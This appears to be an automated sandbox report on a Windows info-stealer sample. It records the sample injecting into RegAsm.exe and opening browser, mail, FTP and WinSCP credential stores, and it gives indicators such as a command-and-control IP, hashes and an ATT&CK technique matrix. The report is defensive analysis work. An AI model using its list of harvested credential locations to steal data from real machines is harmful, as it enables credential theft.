                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B16008Jump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.3.VYLigyTDuW.exe.6d1a10.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.VYLigyTDuW.exe.6d1a04.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.VYLigyTDuW.exe.6d1a10.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.VYLigyTDuW.exe.6d1a04.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.VYLigyTDuW.exe.6d1a10.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.VYLigyTDuW.exe.6d1a10.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.VYLigyTDuW.exe.6d1a10.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.VYLigyTDuW.exe.6d1a10.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.VYLigyTDuW.exe.23a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.4156794778.0000000002E82000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.4156794778.0000000002E7C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1704627717.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1706415121.00000000023A2000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1698582949.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1704541031.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1698333641.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1698654961.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.4154134702.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.4156794778.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: VYLigyTDuW.exe PID: 7300, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7360, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: Yara matchFile source: 0.3.VYLigyTDuW.exe.6d1a10.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.VYLigyTDuW.exe.6d1a04.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.VYLigyTDuW.exe.6d1a10.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.VYLigyTDuW.exe.6d1a04.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.VYLigyTDuW.exe.6d1a10.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.VYLigyTDuW.exe.6d1a10.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.VYLigyTDuW.exe.6d1a10.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.VYLigyTDuW.exe.6d1a10.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.VYLigyTDuW.exe.23a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000003.1704627717.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1706415121.00000000023A2000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1698582949.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1704541031.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1698333641.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1698654961.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.4154134702.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.4156794778.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: VYLigyTDuW.exe PID: 7300, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7360, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.3.VYLigyTDuW.exe.6d1a10.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.VYLigyTDuW.exe.6d1a04.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.VYLigyTDuW.exe.6d1a10.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.VYLigyTDuW.exe.6d1a04.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.VYLigyTDuW.exe.6d1a10.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.VYLigyTDuW.exe.6d1a10.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.VYLigyTDuW.exe.6d1a10.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.VYLigyTDuW.exe.6d1a10.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.VYLigyTDuW.exe.23a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.4156794778.0000000002E82000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.4156794778.0000000002E7C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1704627717.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1706415121.00000000023A2000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1698582949.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1704541031.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1698333641.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1698654961.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.4154134702.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.4156794778.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: VYLigyTDuW.exe PID: 7300, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7360, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      2
                      OS Credential Dumping
                      1
                      File and Directory Discovery
                      Remote Services1
                      Archive Collected Data
                      1
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Shared Modules
                      Boot or Logon Initialization Scripts311
                      Process Injection
                      2
                      Obfuscated Files or Information
                      1
                      Credentials in Registry
                      24
                      System Information Discovery
                      Remote Desktop Protocol2
                      Data from Local System
                      11
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                      Software Packing
                      Security Account Manager111
                      Security Software Discovery
                      SMB/Windows Admin Shares1
                      Email Collection
                      1
                      Non-Standard Port
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      DLL Side-Loading
                      NTDS1
                      Process Discovery
                      Distributed Component Object ModelInput Capture2
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Masquerading
                      LSA Secrets141
                      Virtualization/Sandbox Evasion
                      SSHKeylogging23
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
                      Virtualization/Sandbox Evasion
                      Cached Domain Credentials1
                      Application Window Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
                      Process Injection
                      DCSync1
                      System Network Configuration Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      VYLigyTDuW.exe84%VirustotalBrowse
                      VYLigyTDuW.exe88%ReversingLabsWin32.Spyware.Negasteal
                      VYLigyTDuW.exe100%AviraTR/AD.GenSteal.vwwcv
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api.ipify.org
                      172.67.74.152
                      truefalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://api.ipify.org/false
                          high
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0VYLigyTDuW.exefalse
                            high
                            https://api.ipify.orgVYLigyTDuW.exe, 00000000.00000003.1704541031.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000003.1704627717.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000002.1706415121.00000000023A2000.00000040.10000000.00040000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000003.1698582949.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000003.1698333641.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000003.1698654961.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4156794778.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4154134702.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                              high
                              https://sectigo.com/CPS0VYLigyTDuW.exefalse
                                high
                                http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#VYLigyTDuW.exefalse
                                  high
                                  https://account.dyn.com/VYLigyTDuW.exe, 00000000.00000003.1704541031.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000003.1704627717.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000002.1706415121.00000000023A2000.00000040.10000000.00040000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000003.1698582949.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000003.1698333641.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000003.1698654961.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4154134702.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                    high
                                    http://ocsp.sectigo.com0VYLigyTDuW.exefalse
                                      high
                                      https://api.ipify.org/tRegAsm.exe, 00000001.00000002.4156794778.0000000002E01000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegAsm.exe, 00000001.00000002.4156794778.0000000002E01000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zVYLigyTDuW.exefalse
                                            high
                                            http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#VYLigyTDuW.exefalse
                                              high
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              162.254.34.31
                                              unknownUnited States
                                              64200VIVIDHOSTINGUStrue
                                              172.67.74.152
                                              api.ipify.orgUnited States
                                              13335CLOUDFLARENETUSfalse
                                              Joe Sandbox version:42.0.0 Malachite
                                              Analysis ID:1587591
                                              Start date and time:2025-01-10 15:16:57 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 7m 15s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:6
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:VYLigyTDuW.exe
                                              renamed because original name is a hash value
                                              Original Sample Name:56fdd77d4097b1ce3500d7178788e35731ffe0be159bca0bd1efe4e0477affa3.exe
                                              Detection:MAL
                                              Classification:mal100.spre.troj.spyw.evad.winEXE@3/1@1/2
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 99%
                                              • Number of executed functions: 72
                                              • Number of non-executed functions: 50
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                              • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.60
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                              TimeTypeDescription
                                              09:17:52API Interceptor168x Sleep call for process: RegAsm.exe modified
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              162.254.34.31Ref#66001032.exeGet hashmaliciousAgentTeslaBrowse
                                                Ref#20203216.exeGet hashmaliciousAgentTeslaBrowse
                                                  Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                                    Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                      DJ5PhUwOsM.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                        Ref#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                          Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                            Ref#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                                              BankInformation.vbeGet hashmaliciousAgentTeslaBrowse
                                                                Booking_0731520.vbeGet hashmaliciousAgentTeslaBrowse
                                                                  172.67.74.152jgbC220X2U.exeGet hashmaliciousUnknownBrowse
                                                                  • api.ipify.org/?format=text
                                                                  malware.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                                                                  • api.ipify.org/
                                                                  Simple1.exeGet hashmaliciousUnknownBrowse
                                                                  • api.ipify.org/
                                                                  Simple2.exeGet hashmaliciousUnknownBrowse
                                                                  • api.ipify.org/
                                                                  systemConfigChecker.exeGet hashmaliciousUnknownBrowse
                                                                  • api.ipify.org/
                                                                  systemConfigChecker.exeGet hashmaliciousUnknownBrowse
                                                                  • api.ipify.org/
                                                                  2b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                                  • api.ipify.org/
                                                                  Zc9eO57fgF.elfGet hashmaliciousUnknownBrowse
                                                                  • api.ipify.org/
                                                                  67065b4c84713_Javiles.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                  • api.ipify.org/
                                                                  Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                                                  • api.ipify.org/
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  api.ipify.orggem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                  • 104.26.12.205
                                                                  https://www.tremendous.com/email/activate/yE_yBdRtyVv4Xqgg7hu_Get hashmaliciousUnknownBrowse
                                                                  • 172.67.74.152
                                                                  https://marcuso-wq.github.io/home/Get hashmaliciousHTMLPhisherBrowse
                                                                  • 172.67.74.152
                                                                  drop1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                  • 172.67.74.152
                                                                  https://vq6btbhdpo.nutignaera.shop/?email=YWxlamFuZHJvLmdhcnJpZG9Ac2VhYm9hcmRtYXJpbmUuY29tGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                  • 104.26.12.205
                                                                  EZZGTmJj4O.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 104.26.13.205
                                                                  proforma invoice pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  • 104.26.12.205
                                                                  mail (4).emlGet hashmaliciousUnknownBrowse
                                                                  • 172.67.74.152
                                                                  random.exeGet hashmaliciousCStealerBrowse
                                                                  • 104.26.12.205
                                                                  random.exeGet hashmaliciousCStealerBrowse
                                                                  • 172.67.74.152
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  VIVIDHOSTINGUSRef#66001032.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 162.254.34.31
                                                                  Ref#20203216.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 162.254.34.31
                                                                  arm4.elfGet hashmaliciousMiraiBrowse
                                                                  • 192.154.238.20
                                                                  Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 162.254.34.31
                                                                  Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 162.254.34.31
                                                                  DJ5PhUwOsM.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                  • 162.254.34.31
                                                                  Ref#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                  • 162.254.34.31
                                                                  sh4.elfGet hashmaliciousMiraiBrowse
                                                                  • 192.26.155.193
                                                                  Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                                  • 162.254.34.31
                                                                  Ref#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                                                  • 162.254.34.31
                                                                  CLOUDFLARENETUSbd9Gvqt6AK.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 104.21.80.1
                                                                  PO-0005082025 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • 172.67.131.144
                                                                  zrNcqxZRSM.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                  • 188.114.96.3
                                                                  Salary Payment Information Discrepancy_pdf.pif.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • 104.21.48.1
                                                                  PO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 104.21.96.1
                                                                  http://www.lpb.gov.lrGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                  • 104.17.25.14
                                                                  https://samantacatering.com/Get hashmaliciousUnknownBrowse
                                                                  • 104.21.83.97
                                                                  https://sign.zoho.com/zsguest?locale=en&sign_id=234b4d535f4956237c699124bb06f6840075804affff79070f72fbd27ec4885c3a2ba06657b8a52338eb80052baee9f74c4e2e0e7f85c073df939f1ac4dff75f76c95d46ac2361c7b14335e4f12c5c5d49c49b1d2f4c838a&action_type=SIGNGet hashmaliciousUnknownBrowse
                                                                  • 104.17.25.14
                                                                  https://www.filemail.com/d/rxythqchkhluipl?skipreg=trueGet hashmaliciousUnknownBrowse
                                                                  • 104.17.24.14
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  3b5074b1b5d032e5620f69f9f700ff0eQUOTATION-9044456778.pdf (83kb).com.exeGet hashmaliciousPureLog Stealer, QuasarBrowse
                                                                  • 172.67.74.152
                                                                  PO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 172.67.74.152
                                                                  https://sign.zoho.com/zsguest?locale=en&sign_id=234b4d535f4956237c699124bb06f6840075804affff79070f72fbd27ec4885c3a2ba06657b8a52338eb80052baee9f74c4e2e0e7f85c073df939f1ac4dff75f76c95d46ac2361c7b14335e4f12c5c5d49c49b1d2f4c838a&action_type=SIGNGet hashmaliciousUnknownBrowse
                                                                  • 172.67.74.152
                                                                  IMG_10503677.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 172.67.74.152
                                                                  XClient.exeGet hashmaliciousXWormBrowse
                                                                  • 172.67.74.152
                                                                  RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 172.67.74.152
                                                                  1736491685cd440ba02224486139c45779065ac91a3edb422c48d3d3c6920c4d30fc9d2bfc582.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                  • 172.67.74.152
                                                                  https://aqctslc.com/Get hashmaliciousUnknownBrowse
                                                                  • 172.67.74.152
                                                                  https://sacredartscommunications.com/Get hashmaliciousHTMLPhisherBrowse
                                                                  • 172.67.74.152
                                                                  No context
                                                                  Process:C:\Users\user\Desktop\VYLigyTDuW.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):46
                                                                  Entropy (8bit):1.0424600748477153
                                                                  Encrypted:false
                                                                  SSDEEP:3:/lbq:4
                                                                  MD5:8CB7B7F28464C3FCBAE8A10C46204572
                                                                  SHA1:767FE80969EC2E67F54CC1B6D383C76E7859E2DE
                                                                  SHA-256:ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
                                                                  SHA-512:9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
                                                                  Malicious:false
                                                                  Reputation:high, very likely benign file
                                                                  Preview:........................................user.
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):6.782767906080151
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • VXD Driver (31/22) 0.00%
                                                                  File name:VYLigyTDuW.exe
                                                                  File size:1'956'616 bytes
                                                                  MD5:89471f2ae47d710f5b6db4afe8a48e77
                                                                  SHA1:903d8a21673dcc19826fa56731dc2710f2d95755
                                                                  SHA256:56fdd77d4097b1ce3500d7178788e35731ffe0be159bca0bd1efe4e0477affa3
                                                                  SHA512:6f621de51e83544a0b1aa8c65b588f553049f32d8a441a65d9b7f1fdf637c7e96af593172aadf77f6260cef3e5de78924a1032964b9412ad7eec579e4c578852
                                                                  SSDEEP:49152:ZbdYAm4zrbdYAm4zobdYAm4zvbdYAm4zdbdYAm4zZbdYAm4zpQBaYPxjFqFJ:Rdr3drCdrzdrddrRdruLPxBU
                                                                  TLSH:4F95AE43724C57ADCA630B31F63FC0A413259EBF96144B1B36CBFB2D19BA15B492A2C5
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G..g..................... ......d.............@........................................................................
                                                                  Icon Hash:6ced8d96b2ace4b2
                                                                  Entrypoint:0x5aff64
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:true
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                  DLL Characteristics:
                                                                  Time Stamp:0x6704A147 [Tue Oct 8 03:04:39 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:e0e5cba487d80ef75c8cfd3e40cc6131
                                                                  Signature Valid:false
